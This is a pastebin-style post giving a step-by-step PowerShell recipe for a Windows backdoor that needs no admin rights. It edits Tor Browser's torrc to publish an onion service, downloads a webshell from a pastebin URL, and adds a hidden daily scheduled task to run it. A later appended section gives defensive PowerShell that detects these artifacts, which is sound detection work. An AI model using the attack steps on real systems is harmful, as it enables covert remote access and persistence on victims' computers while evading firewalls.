Vegeta_Ssj

Left Surprise in Tor Browser

Jun 29th, 2020 (edited)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

 _______________________________________
/ Vegeta_Ssj : Windows Backdoor without \
\ Admin, Bypass FW with Tor Browser     /
 ---------------------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

email: vegeta_ssj@riseup.net
jid: vegeta@exploit.im / vegeta_ssj@4cjw6cwpeaeppfqz.onion

https://i.postimg.cc/g2RpjWTZ/webshell.png

Find torrc file:

PS C:\Users\IEUser> Get-Childitem -recurse -filter torrc
Directory: C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/29/2020  12:44 PM           3060 torrc

Left surprise:

$torrcpath = "C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc"
$conf = "HiddenServiceDir C:/Users/IEUser/Desktop/Tor Browser/Browser/TorBrowser/Data/Hidden`nHiddenServicePort 80 127.0.0.1:8080"
$conf | Add-Content -Path $torrcpath

$hostname = "C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Hidden\hostname"
PS C:\Users\IEUser\> cat $hostname
4jq55x4lxjhvsbjhqdsjxsevswx34fdt2xjyuduo6tr2www2p3owk8qd.onion

Download webshell:

$url = "https://pastebin.com/raw/h59LJpni";$output ="$pwd\web-shell.ps1"
Invoke-WebRequest -Uri $url -OutFile $output

Create backdoor | scheduled task:

PS C:\Users\IEUser\Desktop> schtasks.exe /CREATE /SC DAILY /TN "Legit as Fucked" /TR "powershell -windowstyle hidden C:\Users\IEUser\Desktop\web-shell.ps1" /ST 15:27

SUCCESS: The scheduled task "Legit as Fucked" has successfully been created.

#start-process PowerShell.exe -arg $pwd\web.ps1 -WindowStyle Hidden

Enjoy :)
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----
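The paste leaves two artifacts a defender can audit for: HiddenServiceDir/HiddenServicePort lines in a Tor Browser torrc (a browser-only install has no reason to publish an onion service) and a scheduled task that runs PowerShell with a hidden window. The following is an added example, not part of the original paste; the function names Get-TorHiddenService and Test-HiddenPowerShellAction are hypothetical, and the sample inputs are constructed from the values shown above.

```powershell
# Added defensive example; both sample inputs below are constructed.
function Get-TorHiddenService {
    param([Parameter(Mandatory)][string]$TorrcText)
    $current = $null
    foreach ($raw in ($TorrcText -split '\r?\n')) {
        $line = $raw.Trim()
        if ($line -eq '' -or $line.StartsWith('#')) { continue }
        # Tor option names are case-insensitive, and so is -match.
        if ($line -match '^HiddenServiceDir\s+(.+)$') {
            if ($current) { $current }          # emit the previous service
            # Keep the rest of the line: the directory may contain spaces.
            $current = [pscustomobject]@{ Directory = $Matches[1].Trim('"'); Ports = @() }
        }
        elseif ($current -and $line -match '^HiddenServicePort\s+(\d+)(?:\s+(\S+))?') {
            # With no TARGET, Tor forwards to 127.0.0.1 on the same port.
            $target = if ($Matches[2]) { $Matches[2] } else { "127.0.0.1:$($Matches[1])" }
            $current.Ports += "$($Matches[1]) -> $target"
        }
    }
    if ($current) { $current }
}

function Test-HiddenPowerShellAction {
    param([Parameter(Mandatory)][string]$CommandLine)
    # Heuristic: powershell/pwsh with any prefix of -WindowStyle set to Hidden.
    $CommandLine -match '\b(powershell|pwsh)(\.exe)?\b.*\s-w[a-z]*\s+hidden\b'
}

$sampleTorrc = @'
# constructed torrc containing the two lines the paste appends
DataDirectory C:\Users\IEUser\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor
HiddenServiceDir C:/Users/IEUser/Desktop/Tor Browser/Browser/TorBrowser/Data/Hidden
HiddenServicePort 80 127.0.0.1:8080
'@
$sampleActions = @(
    'powershell -windowstyle hidden C:\Users\IEUser\Desktop\web-shell.ps1',
    'C:\Windows\System32\defrag.exe -c -h'
)

# Lists each onion service directory with its virtual-port -> local-target mappings.
Get-TorHiddenService -TorrcText $sampleTorrc | Format-List
# Prints only the task actions that start PowerShell with a hidden window.
$sampleActions | Where-Object { Test-HiddenPowerShellAction $_ }
```

On a live host, pass each file found by `Get-ChildItem -Recurse -Filter torrc` through `Get-Content -Raw`, and build the command lines from the `Execute` and `Arguments` properties of `(Get-ScheduledTask).Actions`.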